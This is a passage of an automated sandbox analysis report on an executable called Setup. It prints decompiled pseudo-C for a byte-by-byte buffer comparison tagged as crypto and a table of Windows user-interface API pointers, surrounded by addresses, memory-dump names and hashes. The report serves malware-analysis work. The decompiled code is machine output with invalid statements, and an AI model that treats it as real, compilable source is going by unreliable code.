                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                                              • Instruction ID: b9897cab8204d5634f640389ba50dbfec78ae8748c11192ea774f69db73d8cb2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 43C15C73C0A9B34AC73A812D409822BEA62AFD165031FC3F2DCE53F3C9953A6D1199D4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00405B62 Relevance: .4, Instructions: 351COMMONCrypto
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00405B62(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t187;
				signed char _t188;
				signed char _t189;
				signed char _t191;
				signed char _t192;
				signed int _t198;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t284 = 0;
					L11:
					if(_t284 != 0) {
						goto L1;
					}
					_t187 =  *(_t177 - 0x18);
					if(_t187 ==  *(_t181 - 0x18)) {
						_t284 = 0;
						L22:
						if(_t284 != 0) {
							goto L1;
						}
						_t188 =  *(_t177 - 0x14);
						if(_t188 ==  *(_t181 - 0x14)) {
							_t284 = 0;
							L33:
							if(_t284 != 0) {
								goto L1;
							}
							_t189 =  *(_t177 - 0x10);
							if(_t189 ==  *(_t181 - 0x10)) {
								_t284 = 0;
								L44:
								if(_t284 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t284 = 0;
									L55:
									if(_t284 != 0) {
										goto L1;
									}
									_t191 =  *(_t177 - 8);
									if(_t191 ==  *(_t181 - 8)) {
										_t284 = 0;
										L66:
										if(_t284 != 0) {
											goto L1;
										}
										_t192 =  *(_t177 - 4);
										if(_t192 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t287 == 0) {
											L70:
											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t289 == 0) {
												L72:
												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t291 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
												if(_t198 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t198;
												goto L78;
											}
											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
											if(_t198 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
										if(_t198 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t293 == 0) {
										L59:
										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t295 == 0) {
											L61:
											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t297 == 0) {
												L63:
												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t284 != 0) {
													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
												}
												goto L66;
											}
											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
											if(_t284 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t300 == 0) {
									L48:
									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t302 == 0) {
										L50:
										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t304 == 0) {
											L52:
											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t284 != 0) {
												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
											}
											goto L55;
										}
										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t307 == 0) {
								L37:
								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t309 == 0) {
									L39:
									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t311 == 0) {
										L41:
										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t284 != 0) {
											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
										}
										goto L44;
									}
									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t314 == 0) {
							L26:
							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t316 == 0) {
								L28:
								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t318 == 0) {
									L30:
									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t284 != 0) {
										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
									}
									goto L33;
								}
								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t321 == 0) {
						L15:
						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t323 == 0) {
							L17:
							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t325 == 0) {
								L19:
								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t284 != 0) {
									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
								}
								goto L22;
							}
							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
					if(_t284 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L11;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t284;
				goto L80;
			}































                                                                                                                                                                                              0x00405b62
                                                                                                                                                                                              0x00405b62
                                                                                                                                                                                              0x00405b68
                                                                                                                                                                                              0x00405bdb
                                                                                                                                                                                              0x00405bdd
                                                                                                                                                                                              0x00405bdf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405be5
                                                                                                                                                                                              0x00405beb
                                                                                                                                                                                              0x00405c6a
                                                                                                                                                                                              0x00405c6c
                                                                                                                                                                                              0x00405c6e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405c74
                                                                                                                                                                                              0x00405c7a
                                                                                                                                                                                              0x00405cf9
                                                                                                                                                                                              0x00405cfb
                                                                                                                                                                                              0x00405cfd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405d03
                                                                                                                                                                                              0x00405d09
                                                                                                                                                                                              0x00405d88
                                                                                                                                                                                              0x00405d8a
                                                                                                                                                                                              0x00405d8c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405d98
                                                                                                                                                                                              0x00405e18
                                                                                                                                                                                              0x00405e1a
                                                                                                                                                                                              0x00405e1c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405e22
                                                                                                                                                                                              0x00405e28
                                                                                                                                                                                              0x00405ea7
                                                                                                                                                                                              0x00405ea9
                                                                                                                                                                                              0x00405eab
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405eb1
                                                                                                                                                                                              0x00405eb7
                                                                                                                                                                                              0x00405f28
                                                                                                                                                                                              0x00405f2a
                                                                                                                                                                                              0x00405f2c
                                                                                                                                                                                              0x00405f2e
                                                                                                                                                                                              0x00405f2e
                                                                                                                                                                                              0x00405f30
                                                                                                                                                                                              0x00406c8c
                                                                                                                                                                                              0x00406c8c
                                                                                                                                                                                              0x00405ec0
                                                                                                                                                                                              0x00405ec2
                                                                                                                                                                                              0x00405ed3
                                                                                                                                                                                              0x00405edb
                                                                                                                                                                                              0x00405edd
                                                                                                                                                                                              0x00405eee
                                                                                                                                                                                              0x00405ef6
                                                                                                                                                                                              0x00405ef8
                                                                                                                                                                                              0x00405f0d
                                                                                                                                                                                              0x00405f15
                                                                                                                                                                                              0x00405f17
                                                                                                                                                                                              0x00405f24
                                                                                                                                                                                              0x00405f24
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405f17
                                                                                                                                                                                              0x00405f01
                                                                                                                                                                                              0x00405f07
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405f09
                                                                                                                                                                                              0x00405f09
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405f09
                                                                                                                                                                                              0x00405ee6
                                                                                                                                                                                              0x00405eec
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405eec
                                                                                                                                                                                              0x00405ecb
                                                                                                                                                                                              0x00405ed1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405ed1
                                                                                                                                                                                              0x00405e31
                                                                                                                                                                                              0x00405e33
                                                                                                                                                                                              0x00405e4a
                                                                                                                                                                                              0x00405e52
                                                                                                                                                                                              0x00405e54
                                                                                                                                                                                              0x00405e6b
                                                                                                                                                                                              0x00405e73
                                                                                                                                                                                              0x00405e75
                                                                                                                                                                                              0x00405e8c
                                                                                                                                                                                              0x00405e94
                                                                                                                                                                                              0x00405e96
                                                                                                                                                                                              0x00405ea3
                                                                                                                                                                                              0x00405ea3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405e96
                                                                                                                                                                                              0x00405e82
                                                                                                                                                                                              0x00405e86
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405e86
                                                                                                                                                                                              0x00405e61
                                                                                                                                                                                              0x00405e65
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405e65
                                                                                                                                                                                              0x00405e40
                                                                                                                                                                                              0x00405e44
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405e44
                                                                                                                                                                                              0x00405da2
                                                                                                                                                                                              0x00405da4
                                                                                                                                                                                              0x00405dbb
                                                                                                                                                                                              0x00405dc3
                                                                                                                                                                                              0x00405dc5
                                                                                                                                                                                              0x00405ddc
                                                                                                                                                                                              0x00405de4
                                                                                                                                                                                              0x00405de6
                                                                                                                                                                                              0x00405dfd
                                                                                                                                                                                              0x00405e05
                                                                                                                                                                                              0x00405e07
                                                                                                                                                                                              0x00405e14
                                                                                                                                                                                              0x00405e14
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405e07
                                                                                                                                                                                              0x00405df3
                                                                                                                                                                                              0x00405df7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405df7
                                                                                                                                                                                              0x00405dd2
                                                                                                                                                                                              0x00405dd6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405dd6
                                                                                                                                                                                              0x00405db1
                                                                                                                                                                                              0x00405db5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405db5
                                                                                                                                                                                              0x00405d12
                                                                                                                                                                                              0x00405d14
                                                                                                                                                                                              0x00405d2b
                                                                                                                                                                                              0x00405d33
                                                                                                                                                                                              0x00405d35
                                                                                                                                                                                              0x00405d4c
                                                                                                                                                                                              0x00405d54
                                                                                                                                                                                              0x00405d56
                                                                                                                                                                                              0x00405d6d
                                                                                                                                                                                              0x00405d75
                                                                                                                                                                                              0x00405d77
                                                                                                                                                                                              0x00405d84
                                                                                                                                                                                              0x00405d84
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405d77
                                                                                                                                                                                              0x00405d63
                                                                                                                                                                                              0x00405d67
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405d67
                                                                                                                                                                                              0x00405d42
                                                                                                                                                                                              0x00405d46
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405d46
                                                                                                                                                                                              0x00405d21
                                                                                                                                                                                              0x00405d25
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405d25
                                                                                                                                                                                              0x00405c83
                                                                                                                                                                                              0x00405c85
                                                                                                                                                                                              0x00405c9c
                                                                                                                                                                                              0x00405ca4
                                                                                                                                                                                              0x00405ca6
                                                                                                                                                                                              0x00405cbd
                                                                                                                                                                                              0x00405cc5
                                                                                                                                                                                              0x00405cc7
                                                                                                                                                                                              0x00405cde
                                                                                                                                                                                              0x00405ce6
                                                                                                                                                                                              0x00405ce8
                                                                                                                                                                                              0x00405cf5
                                                                                                                                                                                              0x00405cf5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405ce8
                                                                                                                                                                                              0x00405cd4
                                                                                                                                                                                              0x00405cd8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405cd8
                                                                                                                                                                                              0x00405cb3
                                                                                                                                                                                              0x00405cb7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405cb7
                                                                                                                                                                                              0x00405c92
                                                                                                                                                                                              0x00405c96
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405c96
                                                                                                                                                                                              0x00405bf4
                                                                                                                                                                                              0x00405bf6
                                                                                                                                                                                              0x00405c0d
                                                                                                                                                                                              0x00405c15
                                                                                                                                                                                              0x00405c17
                                                                                                                                                                                              0x00405c2e
                                                                                                                                                                                              0x00405c36
                                                                                                                                                                                              0x00405c38
                                                                                                                                                                                              0x00405c4f
                                                                                                                                                                                              0x00405c57
                                                                                                                                                                                              0x00405c59
                                                                                                                                                                                              0x00405c66
                                                                                                                                                                                              0x00405c66
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405c59
                                                                                                                                                                                              0x00405c45
                                                                                                                                                                                              0x00405c49
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405c49
                                                                                                                                                                                              0x00405c24
                                                                                                                                                                                              0x00405c28
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405c28
                                                                                                                                                                                              0x00405c03
                                                                                                                                                                                              0x00405c07
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405b6a
                                                                                                                                                                                              0x00405b6a
                                                                                                                                                                                              0x00405b6d
                                                                                                                                                                                              0x00405b71
                                                                                                                                                                                              0x00405b73
                                                                                                                                                                                              0x00405b86
                                                                                                                                                                                              0x00405b86
                                                                                                                                                                                              0x00405b8a
                                                                                                                                                                                              0x00405b8e
                                                                                                                                                                                              0x00405b90
                                                                                                                                                                                              0x00405ba3
                                                                                                                                                                                              0x00405ba3
                                                                                                                                                                                              0x00405ba7
                                                                                                                                                                                              0x00405bab
                                                                                                                                                                                              0x00405bad
                                                                                                                                                                                              0x00405bc0
                                                                                                                                                                                              0x00405bc0
                                                                                                                                                                                              0x00405bc4
                                                                                                                                                                                              0x00405bc8
                                                                                                                                                                                              0x00405bca
                                                                                                                                                                                              0x00405bd0
                                                                                                                                                                                              0x00405bd3
                                                                                                                                                                                              0x00405bd7
                                                                                                                                                                                              0x00405bd7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405bca
                                                                                                                                                                                              0x00405bb3
                                                                                                                                                                                              0x00405bb6
                                                                                                                                                                                              0x00405bba
                                                                                                                                                                                              0x00405bbe
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405bbe
                                                                                                                                                                                              0x00405b96
                                                                                                                                                                                              0x00405b99
                                                                                                                                                                                              0x00405b9d
                                                                                                                                                                                              0x00405ba1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405ba1
                                                                                                                                                                                              0x00405b79
                                                                                                                                                                                              0x00405b7c
                                                                                                                                                                                              0x00405b80
                                                                                                                                                                                              0x00405b84
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405b84
                                                                                                                                                                                              0x00405b5b
                                                                                                                                                                                              0x00405b5b
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                                                              • Instruction ID: db80175d0d6590998ee975eec303c52cb87e4538abda86054e101f6e2aa02e56
                                                                                                                                                                                              • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                                                              • Instruction Fuzzy Hash: 51C14D73D1ADB34AC739812D409822BEA62AFD164132EC7B2DCE53F3C9D13A6D1199D4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00423860 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00423860() {

				 *0x455a58 = GetWindowRect;
				 *0x455a5c = IsMenu;
				 *0x455a60 = GetSubMenu;
				 *0x455a64 = SetDlgItemInt;
				 *0x455a68 = GetWindowPlacement;
				 *0x455a6c = CharLowerBuffA;
				 *0x455a70 = EnableMenuItem;
				 *0x455a74 = CheckMenuRadioItem;
				 *0x455a78 = GetSysColor;
				 *0x455a7c = KillTimer;
				 *0x455a80 = DestroyIcon;
				 *0x455a84 = DestroyWindow;
				 *0x455a88 = PostQuitMessage;
				 *0x455a8c = GetClientRect;
				 *0x455a90 = MoveWindow;
				 *0x455a94 = GetSystemMenu;
				 *0x455a98 = SetTimer;
				 *0x455a9c = SetWindowPlacement;
				 *0x455aa0 = InsertMenuItemA;
				 *0x455aa4 = GetMenu;
				 *0x455aa8 = CheckMenuItem;
				 *0x455aac = SetMenuItemInfoA;
				 *0x455ab0 = SetActiveWindow;
				 *0x455ab4 = DefDlgProcA;
				 *0x455ab8 = RegisterClassA;
				 *0x455abc = EndDialog;
				 *0x455ac0 = SetDlgItemTextA;
				 *0x455ac4 = EnumClipboardFormats;
				 *0x455ac8 = GetClipboardData;
				 *0x455acc = CloseClipboard;
				 *0x455ad0 = GetClassInfoA;
				 *0x455ad4 = CallWindowProcA;
				 *0x455ad8 = SetWindowLongA;
				 *0x455adc = IsDlgButtonChecked;
				 *0x455ae0 = SetWindowTextA;
				 *0x455ae4 = CheckDlgButton;
				 *0x455ae8 = GetActiveWindow;
				 *0x455aec = LoadCursorA;
				 *0x455af0 = MessageBoxA;
				 *0x455af4 = wsprintfA;
				 *0x455af8 = GetDlgItemTextA;
				 *0x455afc = SendMessageA;
				 *0x455b00 = GetCursorPos;
				 *0x455b04 = TrackPopupMenu;
				 *0x455b08 = ClientToScreen;
				 *0x455b0c = DestroyMenu;
				 *0x455b10 = CreatePopupMenu;
				 *0x455b14 = AppendMenuA;
				 *0x455b18 = SendDlgItemMessageA;
				 *0x455b1c = GetDlgItem;
				return SendDlgItemMessageA;
			}



                                                                                                                                                                                              0x00423868
                                                                                                                                                                                              0x00423873
                                                                                                                                                                                              0x0042387f
                                                                                                                                                                                              0x0042388a
                                                                                                                                                                                              0x00423895
                                                                                                                                                                                              0x004238a1
                                                                                                                                                                                              0x004238ac
                                                                                                                                                                                              0x004238b7
                                                                                                                                                                                              0x004238c3
                                                                                                                                                                                              0x004238ce
                                                                                                                                                                                              0x004238d9
                                                                                                                                                                                              0x004238e5
                                                                                                                                                                                              0x004238f0
                                                                                                                                                                                              0x004238fb
                                                                                                                                                                                              0x00423907
                                                                                                                                                                                              0x00423912
                                                                                                                                                                                              0x0042391d
                                                                                                                                                                                              0x00423929
                                                                                                                                                                                              0x00423934
                                                                                                                                                                                              0x0042393f
                                                                                                                                                                                              0x0042394b
                                                                                                                                                                                              0x00423956
                                                                                                                                                                                              0x00423961
                                                                                                                                                                                              0x0042396d
                                                                                                                                                                                              0x00423978
                                                                                                                                                                                              0x00423983
                                                                                                                                                                                              0x0042398f
                                                                                                                                                                                              0x0042399a
                                                                                                                                                                                              0x004239a5
                                                                                                                                                                                              0x004239b1
                                                                                                                                                                                              0x004239bc
                                                                                                                                                                                              0x004239c7
                                                                                                                                                                                              0x004239d3
                                                                                                                                                                                              0x004239de
                                                                                                                                                                                              0x004239e9
                                                                                                                                                                                              0x004239f5
                                                                                                                                                                                              0x00423a00
                                                                                                                                                                                              0x00423a0b
                                                                                                                                                                                              0x00423a17
                                                                                                                                                                                              0x00423a22
                                                                                                                                                                                              0x00423a2d
                                                                                                                                                                                              0x00423a39
                                                                                                                                                                                              0x00423a44
                                                                                                                                                                                              0x00423a4f
                                                                                                                                                                                              0x00423a5b
                                                                                                                                                                                              0x00423a66
                                                                                                                                                                                              0x00423a71
                                                                                                                                                                                              0x00423a7d
                                                                                                                                                                                              0x00423a88
                                                                                                                                                                                              0x00423a93
                                                                                                                                                                                              0x00423a9a

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
